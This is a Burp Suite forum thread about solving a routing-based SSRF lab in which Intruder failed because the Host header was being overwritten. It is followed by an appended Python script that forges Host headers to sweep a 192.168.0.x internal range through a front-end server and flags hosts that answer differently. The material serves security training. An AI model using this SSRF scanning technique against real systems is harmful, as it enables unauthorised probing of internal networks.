Burp Suite User Forum


Lab: Routing-based SSRF

Dsca | Last updated: Feb 15, 2022 07:56AM UTC

Hello, I've tried to solve this lab - Lab: Routing-based SSRF. When I try to brute-force the last octet of the 192.168.0.0 IP I always get the 200 HTTP response. I've checked it many times: send GET / to Intruder --> click the 'Clear' button --> add a payload position 192.168.0.§0§ --> go to the Payloads tab --> select the "Numbers" type --> from 0 to 255, step 1. Start attack. So as I said, Intruder gives me only HTTP 200 and (which is stranger) in these 255 requests the Host header doesn't change. I mean I have this in the Positions tab:

GET / HTTP/1.1
Host: 192.168.0.§0§

But Burp sends 255 requests with this header:

GET / HTTP/1.1
Host: aca21fa01f7e75fbc0ef0f9f0048006f.web-security-academy.net

I don't know what's going on.

Ben, PortSwigger Agent | Last updated: Feb 15, 2022 09:46AM UTC

Hi, that sounds rather strange - are you able to email us at support@portswigger.net and include some screenshots of the setup that you have in Intruder and the results that you are seeing? Having just run through the lab now, it works as expected for me, so it would be useful to see exactly what is happening when you try this.

Dsca | Last updated: Feb 17, 2022 06:29AM UTC

I'm sorry, this is my fault. I forgot to disable the "Update Host header to match target" option.

Ben, PortSwigger Agent | Last updated: Feb 17, 2022 08:21AM UTC

Not a problem - glad you were able to solve it in the end!

Erin | Last updated: May 26, 2022 08:57PM UTC

https://forum.portswigger.net/thread/lab-routing-based-ssrf-4b06e7e3c52b7

Erin | Last updated: May 26, 2022 08:58PM UTC

Sorry, wrong copy/paste. I am getting this same 200 result in the Intruder. Where is the setting for "Update Host header to match target" option? I cannot find this to disable it in Burp to retry the attack.

Ben, PortSwigger Agent | Last updated: May 27, 2022 06:58AM UTC

Hi, assuming that you are using one of the later versions of Burp, the 'Update Host header to match target' checkbox is in the Positions sub-tab of your Intruder attack. I have highlighted this option in the screenshot accessible below: https://snipboard.io/kBMK6v.jpg
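For readers who want to see what Intruder is actually doing in this attack, and why the "Update Host header to match target" option breaks it, here is an added example (not PortSwigger's code and not part of the original thread). It builds each request as raw bytes so that the Host header is set explicitly to 192.168.0.N while the TLS connection (and SNI) still go to the lab front end; that separation is the whole point of routing-based SSRF, and it is exactly what the Intruder option undoes when it rewrites Host back to the target. The lab hostname is a placeholder, the offline transport is constructed for demonstration, and the internal IP and response codes it returns are made up; swap in send_raw to run against a real lab instance.

```python
import socket
import ssl
from collections import Counter

# Placeholder: substitute your own lab instance hostname.
TARGET_HOST = "YOUR-LAB-ID.web-security-academy.net"
TARGET_PORT = 443


def build_request(host_header: str, path: str = "/") -> bytes:
    """Build a raw HTTP/1.1 request with an explicitly chosen Host header.

    Sending raw bytes means nothing between us and the wire (an HTTP client
    library, or Intruder's 'Update Host header to match target' option)
    can silently rewrite Host to the connection target.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host_header}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_status(response: bytes) -> int:
    """Return the numeric status code from a raw HTTP response."""
    first_line = response.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = first_line.split(" ")
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"unparseable status line: {first_line!r}")
    return int(parts[1])


def send_raw(request: bytes, target_host: str = TARGET_HOST,
             target_port: int = TARGET_PORT) -> bytes:
    """Real transport: TLS-connect to the lab front end and send the bytes.

    SNI stays the lab hostname; only the Host header carries the internal IP.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((target_host, target_port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=target_host) as tls:
            tls.sendall(request)
            chunks = []
            while True:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
    return b"".join(chunks)


def scan_last_octet(send, prefix: str = "192.168.0.", path: str = "/") -> dict:
    """Send one request per last octet 0..255 and map each IP to its status."""
    results = {}
    for octet in range(256):
        ip = f"{prefix}{octet}"
        results[ip] = parse_status(send(build_request(ip, path)))
    return results


def outliers(results: dict) -> dict:
    """Hosts whose status differs from the most common (baseline) status.

    If every one of the 256 responses has the same code (for example all 200),
    the Host header was almost certainly not being varied at all, which is
    the symptom described in the thread.
    """
    baseline, _ = Counter(results.values()).most_common(1)[0]
    return {ip: code for ip, code in results.items() if code != baseline}


def fake_send(request: bytes) -> bytes:
    """Constructed offline transport: one made-up internal host answers
    differently from the rest. The IP and codes are illustrative only."""
    host = request.split(b"\r\n")[1].split(b": ", 1)[1].decode()
    if host == "192.168.0.137":
        return b"HTTP/1.1 302 Found\r\nLocation: /admin\r\nContent-Length: 0\r\n\r\n"
    return b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"


if __name__ == "__main__":
    # Replace fake_send with send_raw to scan a real lab instance.
    print(outliers(scan_last_octet(fake_send)))
```

Triaging on "anything that differs from the baseline" rather than on a specific code keeps the script useful when the interesting host answers with a redirect, a different body length, or an error, and a result set with no outliers at all is the quickest sign that your Host header is being overwritten.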
